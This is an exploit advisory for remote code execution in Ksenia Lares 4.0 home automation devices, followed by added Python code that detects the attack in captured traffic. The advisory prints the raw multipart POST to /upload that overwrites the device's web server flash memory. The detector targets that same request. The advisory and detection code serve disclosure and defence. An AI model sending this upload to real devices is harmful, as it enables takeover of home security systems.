## https://sploitus.com/exploit?id=PACKETSTORM:190178
# Exploit Title: Ksenia Security Lares 4.0 Home Automation Remote Code Execution
    # Google Dork: N/A
    # Date: 31 March 2025
    # Exploit Author: Mencha 'ShadeLock' Isajlovska
    # Vendor Homepage: https://www.kseniasecurity.com/en/
    # Software Link: https://www.kseniasecurity.com/en/company/why-lares-4-0.html
    # Version: Lares 4.0
    # Tested on: Ksenia Lares Webserver
    # CVE : N/A
    # Desc: The device provides access to an unprotected endpoint, enabling
    the upload of MPFS File System binary images. Authenticated attackers
    can exploit this vulnerability to overwrite the flash program memory
    containing the web server's main interfaces, potentially leading to
    arbitrary code execution.
    
    
    POST /upload HTTP/1.1
    Host: 192.168.1.2
    
    ------WebKitFormBoundary5GYWB4nichZAk7BS
    Content-Disposition: form-data; name="i"; filename="MPFSImage.bin"
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundary5GYWB4nichZAk7BS--
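
For monitoring devices that cannot be patched immediately, the following added example (not part of the original advisory or of any vendor code) flags captured HTTP requests that match the upload shown above: a `POST` to `/upload` carrying a multipart file part named `i`. It assumes raw requests are available as bytes from a reverse proxy or packet capture; the function names and the sample captures are hypothetical and constructed.

```python
import re

# Indicators copied from the request shown in the advisory.
UPLOAD_PATH = "/upload"
FIELD_NAME = "i"
DISPOSITION = re.compile(
    rb'Content-Disposition:\s*form-data;\s*name="([^"]*)"(?:;\s*filename="([^"]*)")?',
    re.IGNORECASE,
)

def inspect_request(raw: bytes):
    """Return a finding dict for a POST to the upload endpoint, else None."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].decode("latin-1").split()
    if len(parts) < 2:
        return None
    method, path = parts[0].upper(), parts[1].split("?", 1)[0]
    if method != "POST" or path.rstrip("/") != UPLOAD_PATH:
        return None
    finding = {"path": path, "field": None, "filename": None, "severity": "medium"}
    for name, filename in DISPOSITION.findall(body):
        if filename:  # a file part: this is an image upload, not a form post
            finding["field"] = name.decode("latin-1")
            finding["filename"] = filename.decode("latin-1")
            if finding["field"] == FIELD_NAME:
                finding["severity"] = "high"
            break
    return finding

# Constructed sample captures (hypothetical; the payload is filler, not an image).
B = b"----WebKitFormBoundary5GYWB4nichZAk7BS"
SAMPLES = [
    b"POST /upload HTTP/1.1\r\nHost: 192.168.1.2\r\n\r\n--" + B + b"\r\n"
    b'Content-Disposition: form-data; name="i"; filename="MPFSImage.bin"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n" + b"\x00" * 8
    + b"\r\n--" + B + b"--\r\n",
    b"GET /index.htm HTTP/1.1\r\nHost: 192.168.1.2\r\n\r\n",
    b"POST /upload HTTP/1.1\r\nHost: 192.168.1.2\r\n\r\nx=1",
]

def scan(captures):
    """Return (index, finding) for every capture that needs review."""
    hits = [(n, inspect_request(raw)) for n, raw in enumerate(captures)]
    return [(n, f) for n, f in hits if f is not None]

if __name__ == "__main__":
    for n, f in scan(SAMPLES):
        print(n, f)
```

A `high` finding means the request matches the advisory's file upload; `medium` means a `POST` reached `/upload` without a recognizable file part and still deserves review.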